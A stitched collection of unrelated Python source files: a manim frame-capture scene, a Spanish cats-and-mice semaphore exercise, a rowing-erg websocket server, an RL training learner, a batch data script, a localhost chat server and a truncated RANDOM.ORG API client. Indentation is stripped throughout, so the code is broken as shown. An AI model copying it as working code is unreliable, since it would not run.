# Normally, 'self.tear_down' method is called automatically after 'self.construct'.
    # However, if 'self.tear_down' is overridden, call 'super().tear_down()' manually.
def tear_down(self):
"""
        Finish method for RawFrameScene. This must be called after using this scene.
"""
self.file_writer.close_movie_pipe()
setattr(self, "msg_flag", False)
self.msg_thread.join()
self.print_frame_message(msg_end="\n")
self.num_plays += 1
def play(self, *args, **kwargs):
"""
'self.play' method fails in this scene. Do not use it.
"""
raise Exception("""
'self.play' method is not allowed to use in this scene
Use 'self.capture(...)' instead
""")
def wait(self, duration=DEFAULT_WAIT_TIME, stop_condition=None):
for i in range(int(duration * self.camera.frame_rate)):
self.write_current_frame()
def clear(self):
self.reset_camera()
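# A minimal usage sketch, assuming this scene is run through manim's normal
# pipeline (which calls setup(), construct() and tear_down() in order) and
# that Circle is importable from manimlib.mobject.geometry; the 30-frame
# count is only illustrative (~1 second at 30 fps).
class ExampleRawFrameScene(RawFrameScene):
    def construct(self):
        from manimlib.mobject.geometry import Circle
        circle = Circle()
        for _ in range(30):
            circle.shift(RIGHT * 0.05)  # RIGHT comes from manimlib.constants
            self.capture([circle])      # render and write one raw frame
        self.wait(0.5)                  # hold the last frame for half a second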
|
gatos.py
|
"""
Problem: cats and mice
Implemented in Python
"""
import threading
import time
import random
mutex = threading.Semaphore(1)
mutex2 = threading.Semaphore(1)
hay_platos = threading.Semaphore(0)
Platos = []
animales = []
comiendo = 0
MaxEat = 1
EComiendo = threading.Semaphore(0)
acabado = 0
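# A rough reading of the synchronization scheme used below: `mutex` guards the
# shared Platos/animales lists, `mutex2` guards the `comiendo` counter,
# `hay_platos` signals that a plate is available for an animal, and `EComiendo`
# wakes the server once a plate has been eaten. `MaxEat` caps how many animals
# may eat at the same time.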
class plato:
def __init__(self):
self.plato = random.random()
print ("Sirviendo comida al plato %1.3f" % self.plato)
time.sleep(self.plato*1/3)
def comido(self):
numero=self.plato
time.sleep(self.plato*2/3)
return(numero)
class cats:
def __init__(self):
self.cats = random.random()
print ("llego el gato numero %1.3f" % self.cats)
time.sleep(self.cats)
def numero(self):
numero=self.cats
return(numero)
class ratones:
def __init__(self):
self.ratones = random.random()
print ("salio el raton numero %1.3f" % self.ratones)
time.sleep(self.ratones)
def numero(self):
numero=self.ratones
return(numero)
def pongo_plato():
global comiendo
global MaxEat
global acabado
while True:
numero = plato().comido()
evento = plato()
mutex2.acquire()
if comiendo < 0:
comiendo=0
if comiendo == MaxEat:
mutex2.release()
if(acabado != 0):
print ("Alguien comio el plato (%1.3f)" % acabado)
EComiendo.acquire()
else:
mutex2.release()
print ("Puede alguien comerse el plato (%1.3f)" % numero)
comiendo += 1
mutex.acquire()
Platos.append(evento)
if (len(animales) != 0):
anim=animales.pop()
mutex.release()
hay_platos.release()
def gato():
global comiendo
global MaxEat
global acabado
while True:
numero = plato().comido()
evento=cats()
animal_n = cats().numero()
hay_platos.acquire()
mutex2.acquire()
if comiendo == MaxEat:
print ("\tEl gato(%1.3f) tiene mucha hambre, y comera del plato (%1.3f)"%(animal_n, numero))
acabado = numero
EComiendo.release()
mutex2.release()
mutex.acquire()
comiendo -= 1
animales.append(evento)
plat = Platos.pop()
mutex.release()
def raton():
global comiendo
global MaxEat
global acabado
while True:
numero = plato().comido()
evento= ratones()
animal_n=ratones().numero()
hay_platos.acquire()
mutex2.acquire()
if comiendo == MaxEat:
print ("\t\tEl raton (%1.3f) voy a comer (%1.3f)" % (animal_n, numero))
acabado = numero
EComiendo.release()
mutex2.release()
mutex.acquire()
comiendo -= 1
animales.append(evento)
plat = Platos.pop()
mutex.release()
# start the threads
threading.Thread(target=pongo_plato, args=[]).start()
threading.Thread(target=gato, args=[]).start()
threading.Thread(target=raton, args=[]).start()
|
ergserver.py
|
#!/usr/bin/env python
# Simple console application that works with pyrow to send data retrieved from
# a connected Concept 2 rowing erg to a client via websockets.
# ==============================================================================
# IMPORTS
# ==============================================================================
# core
import pyrow.pyrow as pyrow # handles connection to ergs
import time # for sleep
import json # for converting data into json strings
import sys # sys.exit
# server
import signal
from optparse import OptionParser
from SimpleWebSocketServer.SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from multiprocessing import Process, Queue
# ==============================================================================
# CLIENT CONNECTION CLASS
# ==============================================================================
class ErgSocket(WebSocket):
# receive message from client
def handleMessage(self):
if self.data is None:
self.data = ''
print("{}: got message: {}".format(self.address, self.data))
# client connected
def handleConnected(self):
print("{}: connected".format(self.address))
# client disconnected
def handleClose(self):
print("{}: closed".format(self.address))
# ==============================================================================
# CORE FUNCTIONS
# ==============================================================================
# take an object, create a formatted message and queue it
def queue_message(message_queue, msg_content, msg_type="TXT", log=True):
    message = { 'type': msg_type, 'content': msg_content, 'time': time.time() }
message_json = json.dumps(message)
message_queue.put(message_json)
if log == True:
if msg_type == "TXT":
print("[SEND] {}".format(str(msg_content)))
else:
print("[SEND] {} ({} bytes)".format(msg_type, len(message_json)))
# monitor a connected erg and send messages to clients connected to the server
def monitor_erg(message_queue, erg):
try:
sleep_time_ms = 5
sleep_time = float(sleep_time_ms) / 1000.0
erg_info = pyrow.pyrow.getErg(erg)
erg_status = pyrow.pyrow.getStatus(erg)
erg_id = erg_info['serial']
message = "Concept 2 erg connected (model {}, serial: {})".format(erg_info['model'], erg_id)
        queue_message(message_queue, message)
# wait for workout to begin, then send stroke data
queue_message(message_queue, "Waiting for workout to begin...")
# keep monitoring indefinitely
while True:
workout = erg.getWorkout()
while workout['state'] == 0:
time.sleep(sleep_time)
workout = erg.getWorkout()
# send workout start message
monitor = erg.getMonitor()
queue_message(message_queue, { 'erg_id' : erg_id, 'monitor' : monitor, 'workout' : workout }, msg_type="WORKOUT_START")
# record workout
stroke_id = 0
forceplot = erg.getForcePlot()
while workout['state'] == 1:
# record force data during the drive
force = forceplot['forceplot'] # start of pull (when strokestate first changed to 2)
monitor = erg.getMonitor()
# stroke start message
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'monitor': monitor }, msg_type="STROKE_START", log=False)
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'time': monitor['time'], 'force': forceplot['forceplot'] }, msg_type="STROKE_FORCE", log=False)
# loop during drive (and make sure we get the end of the stroke)
while True:
monitor = erg.getMonitor()
forceplot = erg.getForcePlot()
force.extend(forceplot['forceplot'])
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'time': monitor['time'], 'forceplot': forceplot['forceplot'] }, msg_type="STROKE_FORCE", log=False)
if forceplot['strokestate'] != 2:
break
monitor = erg.getMonitor() # get monitor data for end of stroke
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'monitor': monitor, 'forceplot': force }, msg_type="STROKE_END", log=False)
print("[{}] time: {}, distance: {}, pace: {}".format(stroke_id, monitor['time'], monitor['distance'], monitor['pace']))
# wait for next stroke
while forceplot['strokestate'] != 2 and workout['state'] == 1:
forceplot = erg.getForcePlot()
workout = erg.getWorkout()
stroke_id += 1
workout = erg.getWorkout()
monitor = erg.getMonitor()
queue_message(message_queue, { 'erg_id': erg_id, 'monitor': monitor, 'workout': workout }, msg_type="WORKOUT_END")
except Exception as e:
print(e)
sys.exit(0)
def main():
# handle command line options
parser = OptionParser(usage="usage: %prog [options]", version="%prog 1.0")
parser.add_option("--host", default='', type='string', action="store", dest="host", help="hostname (localhost)")
parser.add_option("--port", default=8000, type='int', action="store", dest="port", help="port (8000)")
(options, args) = parser.parse_args()
print("Welcome to ErgServer!")
# initialize connection to erg
connected_ergs = pyrow.find()
if len(connected_ergs) == 0:
print("No ergs found.")
else:
print("{} erg(s) found. Starting ErgServer.".format(len(connected_ergs)))
print("(NOTE: This will run forever. Press ctrl+c to quit)")
try:
message_queue = Queue(20)
# connect to erg and monitor it using a new process
erg = pyrow.pyrow(connected_ergs[0])
prc_monitor = Process(target=monitor_erg, args=(message_queue, erg))
prc_monitor.start()
# start the websocket server to accept client connections
erg_server = SimpleWebSocketServer(options.host, options.port, ErgSocket, message_queue)
def close_sig_handler(signal, frame):
erg_server.close()
sys.exit(0)
signal.signal(signal.SIGINT, close_sig_handler)
erg_server.serveforever()
except:
pass
print("Closing ErgServer. See you next time!")
try:
prc_monitor.terminate()
except:
pass
sys.exit(0)
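# Typical invocation (assuming a Concept 2 erg is attached over USB):
#   python ergserver.py --host localhost --port 8000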
if __name__ == "__main__":
main()
|
learner.py
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Create a module cover the training process within the RL problems."""
import os
import threading
from time import time
from copy import deepcopy
from multiprocessing import Queue, Process
import numpy as np
from absl import logging
from collections import deque, defaultdict
import setproctitle
from xt.environment import env_builder
from xt.framework.trainer import build_alg_with_trainer
from xt.framework.predictor import Predictor
from xt.algorithm.pbt import PbtAid
from zeus.visual.tensorboarder import SummaryBoard
from zeus.common.util.evaluate_xt import make_workspace_if_not_exist, parse_benchmark_args
from zeus.common.ipc.uni_comm import UniComm
from zeus.common.ipc.message import message, get_msg_data, set_msg_info, set_msg_data, get_msg_info
from zeus.common.util.common import bytes_to_str
from zeus.common.util.hw_cloud_helper import mox_makedir_if_not_existed
from zeus.common.util.logger import Logger, StatsRecorder
from zeus.common.util.profile_stats import PredictStats, TimerRecorder
class Learner(object):
"""Learner manage the train-processing of whole RL pipe-line."""
def __init__(
self,
alg_para,
env_para,
agent_para,
eval_adapter=None,
data_url=None,
benchmark_info=None,
name="T0",
):
self._name = name
self.alg_para = deepcopy(alg_para)
self.process_num = self.alg_para.get("process_num", 1)
self.eval_adapter = eval_adapter
self.train_worker = None
self.send_train = None
self.send_predict = UniComm("ShareByPlasma")
self.send_broker = None
self.send_broker_predict = Queue()
self.stats_deliver = None
self.train_lock = threading.Lock()
self.alg = None
self.trainer = None
self.shared_buff = None
_model_dir = ["models", "benchmark"]
self.bm_args = \
parse_benchmark_args(env_para, alg_para, agent_para, benchmark_info)
self.workspace, _archive, _job = \
make_workspace_if_not_exist(self.bm_args, _model_dir, task_name=self._name)
self.bm_board = SummaryBoard(_archive, _job)
self.model_path = os.path.join(self.workspace, _model_dir[0])
logging.info("{}\nworkspace:\n\t{}\n".format("*" * 10, self.workspace))
self.max_step = agent_para.get("agent_config", {}).get("complete_step")
self.max_episode = agent_para.get("agent_config", {}).get("complete_episode")
self._log_interval = benchmark_info.get("log_interval_to_train", 10)
self._explorer_ids = list()
self._pbt_aid = None
# For Cloud
self.s3_path = None
if data_url is not None:
self.s3_path = os.path.join(data_url, _model_dir[0])
mox_makedir_if_not_existed(self.s3_path)
def add_to_pbt(self, pbt_config, metric, weights):
"""Add this lerner to population."""
self._pbt_aid = PbtAid(self.name, self.alg_para, pbt_config, metric, weights)
@property
def explorer_ids(self):
return self._explorer_ids
@explorer_ids.setter
def explorer_ids(self, val):
self._explorer_ids = val
@property
def name(self):
return self._name
def async_predict(self):
"""Create predict thread."""
predict = [
PredictThread(
i,
self.alg,
self.send_predict,
self.send_broker,
self.stats_deliver,
self.train_lock,
)
for i in range(2)
]
predict_thread = [threading.Thread(target=t.predict) for t in predict]
for t in predict_thread:
t.setDaemon(True)
t.start()
def create_predictor(self):
"""Create predictor."""
config_info = {'alg_para': self.alg_para}
predictor = Predictor(0, config_info, self.send_predict,
self.send_broker_predict, self._name)
# self.send_predict = predictor.request_q
# print("send predict", self.send_predict)
p = Process(target=predictor.start)
p.daemon = True
p.start()
def init_async_train(self):
"""Create train worker."""
self.train_worker = TrainWorker(
self.send_train,
self.alg,
self.train_lock,
self.model_path,
self.send_broker,
self.s3_path,
self.max_step,
self.max_episode,
self.stats_deliver,
self.eval_adapter,
log_interval=self._log_interval,
name=self._name
)
self.train_worker.explorer_ids = self.explorer_ids
self.train_worker.pbt_aid = self._pbt_aid
def submit_algorithm(self, alg_instance, trainer_obj, shared_buff):
"""Submit an algorithm, to update algorithm instance description."""
self.alg = alg_instance
self.trainer = trainer_obj
self.shared_buff = shared_buff
def start(self):
"""Start all system."""
self.create_predictor()
alg, trainer_obj, shared_list = build_alg_with_trainer(
deepcopy(self.alg_para), self.send_broker, self.model_path, self.process_num
)
self.submit_algorithm(alg, trainer_obj, shared_list)
# self.async_predict()
self.init_async_train()
def main_loop(self):
"""Run with while True, cover the working loop."""
self.train_worker.train()
# user operation after train process
class TrainWorker(object):
"""TrainWorker Process manage the trajectory data set and optimizer."""
def __init__(
self,
train_q,
alg,
lock,
model_path,
model_q,
s3_path,
max_step,
max_episode,
stats_deliver,
eval_adapter=None,
**kwargs,
):
self.train_q = train_q
self.alg = alg
self.lock = lock
self.model_path = model_path
self.model_q = model_q
self.actor_reward = defaultdict(float)
self.actor_trajectory = defaultdict(int)
self.rewards = []
self.s3_path = s3_path
self.max_step = max_step
self.actual_step = 0
self.name = kwargs.get('name', 'T0')
self.max_episode = max_episode
self.elapsed_episode = 0 # off policy, elapsed_episode > train count
self.won_in_episodes = deque(maxlen=256)
self.train_count = 0
self.stats_deliver = stats_deliver
self.e_adapter = eval_adapter
self.logger = Logger(os.path.dirname(model_path))
self._metric = TimerRecorder("leaner_model", maxlen=50,
fields=("fix_weight", "send"))
self._log_interval = kwargs["log_interval"]
self._explorer_ids = None
self._pbt_aid = None
self._train_data_counter = defaultdict(int)
@property
def explorer_ids(self):
return self._explorer_ids
@explorer_ids.setter
def explorer_ids(self, val):
self._explorer_ids = val
@property
def pbt_aid(self):
return self._pbt_aid
@pbt_aid.setter
def pbt_aid(self, val):
self._pbt_aid = val
def _dist_policy(self, weight=None, save_index=-1, dist_cmd="explore"):
"""Distribute model tool."""
explorer_set = self.explorer_ids
ctr_info = self.alg.dist_model_policy.get_dist_info(save_index, explorer_set)
if isinstance(ctr_info, dict):
ctr_info = [ctr_info]
for _ctr in ctr_info:
to_send_data = message(weight, cmd=dist_cmd, **_ctr)
self.model_q.send(to_send_data)
def _handle_eval_process(self, loss):
if not self.e_adapter:
return
if self.e_adapter.if_eval(self.train_count):
weights = self.alg.get_weights()
self.e_adapter.to_eval(weights,
self.train_count,
self.actual_step,
self.logger.elapsed_time,
self.logger.train_reward,
loss)
elif not self.e_adapter.eval_result_empty:
eval_ret = self.e_adapter.fetch_eval_result()
if eval_ret:
logging.debug("eval stats: {}".format(eval_ret))
self.stats_deliver.send({"data": eval_ret, "is_bm": True}, block=True)
def _meet_stop(self):
if self.max_step and self.actual_step > self.max_step:
return True
        # Under PBT, max_episode needs to be set in pbt_config,
        # because the episode count is reset after each pbt.exploit.
if self.max_episode and self.elapsed_episode > self.max_episode:
return True
return False
def train(self):
"""Train model."""
if not self.alg.async_flag:
policy_weight = self.alg.get_weights()
self._dist_policy(weight=policy_weight)
loss = 0
while True:
for _tf_val in range(self.alg.prepare_data_times):
# logging.debug("wait data for preparing-{}...".format(_tf_val))
with self.logger.wait_sample_timer:
data = self.train_q.recv()
with self.logger.prepare_data_timer:
data = bytes_to_str(data)
self.record_reward(data)
self.alg.prepare_data(data["data"], ctr_info=data["ctr_info"])
                # DQN-style algorithms count each 'SARSA' sample as one episode;
                # the episodic count is used as the train-ready flag, and each
                # pbt exploit step resets it.
self.elapsed_episode += 1
# logging.debug("Prepared data-{}.".format(_tf_val))
            # Sync the model beforehand if needed, then run PBT if configured.
if self.pbt_aid:
if self.pbt_aid.meet_stop(self.elapsed_episode):
break
cur_info = dict(episodic_reward_mean=self.logger.train_reward_avg,
elapsed_step=self.actual_step,
elapsed_episode=self.elapsed_episode)
new_alg = self.pbt_aid.step(cur_info, cur_alg=self.alg)
                if new_alg:  # re-assign the algorithm if needed
self.alg = new_alg
if not self.alg.async_flag:
policy_weight = self.alg.get_weights()
self._dist_policy(weight=policy_weight)
continue
if self._meet_stop():
self.stats_deliver.send(self.logger.get_new_info(), block=True)
break
if not self.alg.train_ready(self.elapsed_episode, dist_dummy_model=self._dist_policy):
continue
with self.lock, self.logger.train_timer:
# logging.debug("start train process-{}.".format(self.train_count))
loss = self.alg.train(episode_num=self.elapsed_episode)
                if isinstance(loss, (float, np.floating)):
self.logger.record(train_loss=loss)
with self.lock:
if self.alg.if_save(self.train_count):
_name = self.alg.save(self.model_path, self.train_count)
# logging.debug("to save model: {}".format(_name))
self._handle_eval_process(loss)
            # Distributing the model requires the checkpoint to be ready.
if not self.alg.async_flag and self.alg.checkpoint_ready(self.train_count):
_save_t1 = time()
policy_weight = self.alg.get_weights()
self._metric.append(fix_weight=time() - _save_t1)
_dist_st = time()
self._dist_policy(policy_weight, self.train_count)
self._metric.append(send=time() - _dist_st)
self._metric.report_if_need()
else:
if self.alg.checkpoint_ready(self.train_count):
policy_weight = self.alg.get_weights()
weight_msg = message(policy_weight, cmd="predict{}".format(self.name), sub_cmd='sync_weights')
self.model_q.send(weight_msg)
if self.train_count % self._log_interval == 0:
self.stats_deliver.send(self.logger.get_new_info(), block=True)
self.train_count += 1
def record_reward(self, train_data):
"""Record reward in train."""
broker_id = get_msg_info(train_data, 'broker_id')
explorer_id = get_msg_info(train_data, 'explorer_id')
agent_id = get_msg_info(train_data, 'agent_id')
key = (broker_id, explorer_id, agent_id)
# key = learner_stats_id(train_data["ctr_info"])
# record the train_data received
self._train_data_counter[key] += 1
self.alg.dist_model_policy.add_processed_ctr_info(key)
data_dict = get_msg_data(train_data)
# update multi agent train reward without done flag
if self.alg.alg_name in ("QMixAlg", ): # fixme: unify the record op
self.actual_step += np.sum(data_dict["filled"])
self.won_in_episodes.append(data_dict.pop("battle_won"))
self.logger.update(explore_won_rate=np.nanmean(self.won_in_episodes))
self.logger.record(
step=self.actual_step,
train_reward=np.sum(data_dict["reward"]),
train_count=self.train_count,
)
return
elif self.alg.alg_config['api_type'] == "unified":
self.actual_step += len(data_dict["done"])
self.logger.record(
step=self.actual_step,
train_reward=np.sum(data_dict["reward"]),
train_count=self.train_count,
)
return
data_length = len(data_dict["done"]) # fetch the train data length
for data_index in range(data_length):
reward = data_dict["reward"][data_index]
done = data_dict["done"][data_index]
info = data_dict["info"][data_index]
self.actual_step += 1
if isinstance(info, dict):
self.actor_reward[key] += info.get("eval_reward", reward)
self.actor_trajectory[key] += 1
done = info.get("real_done", done)
if done:
self.logger.record(
step=self.actual_step,
train_count=self.train_count,
train_reward=self.actor_reward[key],
trajectory_length=self.actor_trajectory[key],
)
# logging.debug("{} epi reward-{}. with len-{}".format(
# key, self.actor_reward[key], self.actor_trajectory[key]))
self.actor_reward[key] = 0.0
self.actor_trajectory[key] = 0
class PredictThread(object):
"""Predict Worker for async algorithm."""
def __init__(self, thread_id, alg, request_q, reply_q, stats_deliver, lock):
self.alg = alg
self.thread_id = thread_id
self.request_q = request_q
self.reply_q = reply_q
self.lock = lock
self.stats_deliver = stats_deliver
self._report_period = 200
self._stats = PredictStats()
def predict(self):
"""Predict action."""
while True:
start_t0 = time()
data = self.request_q.recv()
state = get_msg_data(data)
self._stats.obs_wait_time += time() - start_t0
start_t1 = time()
with self.lock:
action = self.alg.predict(state)
self._stats.inference_time += time() - start_t1
set_msg_info(data, cmd="predict_reply")
set_msg_data(data, action)
# logging.debug("msg to explore: ", data)
self.reply_q.send(data)
self._stats.iters += 1
if self._stats.iters > self._report_period:
_report = self._stats.get()
self.stats_deliver.send(_report, block=True)
def patch_model_config_by_env_info(config, env_info):
model_info = config["model_para"]
if "model_config" not in model_info["actor"].keys():
model_info["actor"].update({"model_config": dict()})
model_config = model_info["actor"]["model_config"]
model_config.update({"action_type": env_info.get("action_type")})
return model_info
def patch_alg_within_config(config, node_type="node_config"):
"""combine the algorithm parameters"""
alg_para = config["alg_para"].copy()
agent_para = config["agent_para"]
node_config = config[node_type]
    # defaults for quickly running the 2s_vs_1sc map
env_attr = {
"state_shape": 27,
        # obs_shape will be extended with action & agent id in the algorithm!
"obs_shape": 17,
"n_actions": 7,
"n_agents": 2,
"episode_limit": 300,
"api_type": "standalone",
"agent_ids": [0],
}
# get env info
env = env_builder(**config["env_para"])
env_info = env.get_env_info()
env.close()
if "alg_config" not in alg_para:
alg_para["alg_config"] = dict()
alg_para["alg_config"].update(
{
"instance_num": config["env_num"] * len(node_config),
"agent_num": agent_para.get("agent_num", 1),
"env_attr": env_attr,
"api_type": env_info.get("api_type")
}
)
model_info = patch_model_config_by_env_info(config, env_info)
# update env attr into model info
model_info["actor"]["model_config"].update(env_attr)
alg_para["model_info"] = model_info
config.update({"alg_para": alg_para})
return config
def setup_learner(config, eval_adapter, learner_index, data_url=None):
"""Start learner."""
env_para = config["env_para"]
agent_para = config["agent_para"]
alg_para = deepcopy(config["alg_para"])
model_info = alg_para["model_info"]
# set actor.type as learner
model_info["actor"].update({"type": "learner"})
# add benchmark id
bm_info = config.get("benchmark", dict())
learner = Learner(
alg_para,
env_para,
agent_para,
eval_adapter=eval_adapter,
data_url=data_url,
benchmark_info=bm_info,
name="T{}".format(learner_index)
)
learner.config_info = config
return learner
def learner_stats_id(ctr_info):
"""Assemble stats id."""
broker_id = ctr_info.get('broker_id')
explorer_id = ctr_info.get('explorer_id')
agent_id = ctr_info.get('agent_id')
return "_".join(map(str, (broker_id, explorer_id, agent_id)))
|
process_data_fast.py
|
import glob
from process_data import process
import tqdm
if __name__=="__main__":
import threading
THREADS = 4
queue = []
for fname in tqdm.tqdm(glob.glob("/storage/PawelLab/wwydmanski/NCBR-COVID/FTP_DATA/data/upload/pacjenci 201-250/*/*.xls")):
queue.append(threading.Thread(target=process, args=(fname,)))
queue[-1].start()
if len(queue)>=THREADS:
for i in queue:
i.join()
queue = []
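# The loop above runs the threads in batches of THREADS and joins each batch;
# an equivalent, arguably more idiomatic sketch using a thread pool (same
# `process` function, with PATTERN standing in for the glob string above):
#
#     from concurrent.futures import ThreadPoolExecutor
#     with ThreadPoolExecutor(max_workers=THREADS) as pool:
#         list(tqdm.tqdm(pool.map(process, glob.glob(PATTERN))))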
|
chat_server.py
|
import socket
from threading import *
def send_msg(socket):
while True:
msg = input()
socket.send(bytes(msg,"utf-8"))
# creates the socket
server = socket.socket()
PORT = 1234
# bind the socket to the port.
server.bind(('localhost',PORT)) # takes a tuple
# at most 5 connections in the queue
server.listen(5)
print("Listening for clients to connect")
# Establish connection with client.
client, addr = server.accept()
print('Got connection from', addr)
Thread(target=send_msg, args=(client, )).start()
msg = client.recv(1024)
print(msg.decode("utf-8"))
while msg :
msg = client.recv(1024)
print(msg.decode("utf-8"))
client.close()
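# A matching client is not part of this file; a minimal counterpart for local
# testing could look like the sketch below (hypothetical, mirrors the server's
# send/receive loops):
#
#     import socket
#     from threading import Thread
#
#     def send_loop(sock):
#         while True:
#             sock.send(bytes(input(), "utf-8"))
#
#     client = socket.socket()
#     client.connect(('localhost', 1234))
#     Thread(target=send_loop, args=(client,), daemon=True).start()
#     msg = client.recv(1024)
#     while msg:
#         print(msg.decode("utf-8"))
#         msg = client.recv(1024)
#     client.close()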
|
rdoclient.py
|
"""
RANDOM.ORG JSON-RPC API (Release 1) implementation.
This is a Python implementation of the RANDOM.ORG JSON-RPC API (R1).
It provides either serialized or unserialized access to both the signed
and unsigned methods of the API through the RandomOrgClient class. It
also provides a convenience class through the RandomOrgClient class,
the RandomOrgCache, for precaching requests.
Classes:
RandomOrgClient -- main class through which API functions are accessed.
RandomOrgCache -- for precaching API responses.
RandomOrgSendTimeoutError -- when request can't be sent in a set time.
RandomOrgKeyNotRunningError -- key stopped exception.
RandomOrgInsufficientRequestsError -- requests allowance exceeded.
RandomOrgInsufficientBitsError -- bits allowance exceeded.
My changes seem to work for me, but I make no guarantees! (RevMask)
"""
import json
import logging
import threading
import time
import uuid
from datetime import datetime
from queue import Queue, Empty
import requests
# Basic RANDOM.ORG API functions https://api.random.org/json-rpc/1/
_INTEGER_METHOD = 'generateIntegers'
_DECIMAL_FRACTION_METHOD = 'generateDecimalFractions'
_GAUSSIAN_METHOD = 'generateGaussians'
_STRING_METHOD = 'generateStrings'
_UUID_METHOD = 'generateUUIDs'
_BLOB_METHOD = 'generateBlobs'
_GET_USAGE_METHOD = 'getUsage'
# Signed RANDOM.ORG API functions https://api.random.org/json-rpc/1/signing
_SIGNED_INTEGER_METHOD = 'generateSignedIntegers'
_SIGNED_DECIMAL_FRACTION_METHOD = 'generateSignedDecimalFractions'
_SIGNED_GAUSSIAN_METHOD = 'generateSignedGaussians'
_SIGNED_STRING_METHOD = 'generateSignedStrings'
_SIGNED_UUID_METHOD = 'generateSignedUUIDs'
_SIGNED_BLOB_METHOD = 'generateSignedBlobs'
_VERIFY_SIGNATURE_METHOD = 'verifySignature'
# Blob format literals
_BLOB_FORMAT_BASE64 = 'base64'
_BLOB_FORMAT_HEX = 'hex'
# Default backoff to use if no advisoryDelay backoff supplied by server
_DEFAULT_DELAY = 1.0
# On request fetch fresh allowance state if current state data is older than this value
_ALLOWANCE_STATE_REFRESH_SECONDS = 3600.0
class RandomOrgSendTimeoutError(Exception):
"""
RandomOrgClient blocking_timeout exception.
Exception raised by the RandomOrgClient class when blocking_timeout
is exceeded before the request can be sent.
"""
class RandomOrgKeyNotRunningError(Exception):
"""
RandomOrgClient key stopped exception.
Exception raised by the RandomOrgClient class when its API key
has been stopped. Requests will not complete while API key is
in the stopped state.
"""
class RandomOrgInsufficientRequestsError(Exception):
"""
RandomOrgClient server requests allowance exceeded exception.
Exception raised by the RandomOrgClient class when its API key's
server requests allowance has been exceeded. This indicates that a
back-off until midnight UTC is in effect, before which no requests
will be sent by the client as no meaningful server responses will
be returned.
"""
class RandomOrgInsufficientBitsError(Exception):
"""
RandomOrgClient server bits allowance exceeded exception.
Exception raised by the RandomOrgClient class when its API key's
request has exceeded its remaining server bits allowance. If the
client is currently issuing large requests it may be possible to
succeed with smaller requests. Use the client's getBitsLeft() call
to help determine if an alternative request size is appropriate.
"""
class RandomOrgCache(object):
"""
RandomOrgCache for precaching request responses.
Precache for frequently used requests. Instances should only be
obtained using RandomOrgClient's create_x_cache methods, never
created separately.
This class strives to keep a Queue of response results populated
for instant access via its public get method. Work is done by a
background Thread, which issues the appropriate request at suitable
intervals.
Public methods:
stop -- instruct cache to stop repopulating itself.
resume -- if cache is stopped, restart repopulation.
get -- return a response for the request this RandomOrgCache
represents or raise a Queue.Empty exception.
"""
def __init__(self, request_function, process_function, request,
cache_size, bulk_request_number=0, request_number=0):
"""
Constructor.
Initialize class and start Queue population Thread running as a
daemon. Should only be called by RandomOrgClient's
create_x_cache methods.
Keyword arguments:
request_function -- function to send supplied request to server.
process_function -- function to process result of
request_function into expected output.
request -- request to send to server via request_function.
        cache_size -- number of request responses to try to maintain.
bulk_request_number -- if request is set to be issued in bulk,
number of result sets in a bulk request (default 0).
request_number -- if request is set to be issued in bulk,
number of results in a single request (default 0).
"""
self._request_function = request_function
self._process_function = process_function
self._request = request
self._queue = Queue(cache_size)
self._bulk_request_number = bulk_request_number
self._request_number = request_number
# Condition lock to allow notification when an item is consumed
# or pause state is updated.
self._lock = threading.Condition()
self._paused = False
# Thread to keep RandomOrgCache populated.
self._thread = threading.Thread(target=self._populate_queue)
self._thread.daemon = True
self._thread.start()
def _populate_queue(self):
# Keep issuing requests to server until Queue is full. When
# Queue is full if requests are being issued in bulk, wait
        # until Queue has enough space to accommodate all of a bulk
# request before issuing a new request, otherwise issue a new
# request every time an item in the Queue has been consumed.
#
# Note that requests to the server are blocking, i.e., only one
# request will be issued by the cache at any given time.
while True:
while self._paused:
self._lock.acquire()
self._lock.wait()
self._lock.release()
# If we're issuing bulk requests...
if self._bulk_request_number > 0:
# Is there space for a bulk response in the queue?
if self._queue.qsize() < (self._queue.maxsize - self._bulk_request_number):
# Issue and process request and response.
try:
response = self._request_function(self._request)
result = self._process_function(response)
# Split bulk response into result sets.
for i in range(0, len(result), self._request_number):
self._queue.put(result[i:i+self._request_number])
except Exception as e:
# Don't handle failures from _request_function()
# Just try again later.
logging.info("RandomOrgCache populate Exception: " + str(e))
# No space, sleep and wait for consumed notification.
else:
self._lock.acquire()
self._lock.wait()
self._lock.release()
# Not in bulk mode, repopulate queue as it empties.
elif not self._queue.full():
try:
response = self._request_function(self._request)
self._queue.put(self._process_function(response))
except Exception as e:
# Don't handle failures from _request_function()
# Just try again later.
logging.info("RandomOrgCache populate Exception: " + str(e))
# No space, sleep and wait for consumed notification.
else:
self._lock.acquire()
self._lock.wait()
self._lock.release()
def stop(self):
"""
Stop cache.
        Cache will not continue to populate itself.
"""
self._paused = True
self._lock.acquire()
self._lock.notify()
self._lock.release()
def resume(self):
"""
Resume cache.
Cache will resume populating itself if stopped.
"""
self._paused = False
self._lock.acquire()
self._lock.notify()
self._lock.release()
def get(self):
"""
Get next response.
Get next appropriate response for the request this
RandomOrgCache represents or if Queue is empty raise a
Queue.Empty exception.
"""
result = self._queue.get(False)
self._lock.acquire()
self._lock.notify()
self._lock.release()
return result
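    # Illustrative use of get(); a cache instance would come from one of the
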